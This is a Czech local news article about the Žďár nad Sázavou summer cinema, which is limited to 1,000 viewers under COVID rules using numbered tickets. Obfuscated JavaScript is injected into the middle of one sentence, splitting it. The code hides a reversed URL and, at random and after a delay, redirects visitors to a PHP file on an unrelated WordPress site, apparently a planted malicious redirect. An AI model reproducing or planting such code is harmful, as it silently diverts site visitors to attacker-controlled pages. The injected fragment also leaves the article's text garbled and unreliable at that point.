Rainbow page separator

Do letního kina se dostane pouze povolená tisícovka diváků

Úterý, 11. srpna 2020

Žďár nad Sázavou / Tradiční letní kino promítané za žďárským Domem kultury mohou i le["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos navštívit nejenom obyvatelé Žďáru. Uskuteční se ve večerních hodinách od pondělí 17. do pátku 21. srpna a na programu budou opět české a zahraniční snímky určené pro velké i malé diváky. Vzhledem k omezením platícím v souvislosti se šířením koronaviru je povolená kapacita ve venkovním areálu tisíc osob, takže pořadatelé museli nastavit pravidla pro případ, že by přišlo více lidí, což v minulých letech nebylo při promítání divácky atraktivních snímků řídkým jevem. „Pro případ, že by se na místě mělo sejít více než povolených tisíc diváků, pořadatel, jímž je příspěvková organizace města Kultura Žďár, bude mít hlediště „obehnáno“ páskami. Vstup bude pouze jedním koridorem. Při vstupu každý obdrží očíslovaný lístek, takže divák s číslem tisíc bude posledním, který bude do hlediště vpuštěn,“ přiblížil vedoucí odboru školství, kultury, sportu a marketingu žďárského městského úřadu Petr Sedlák.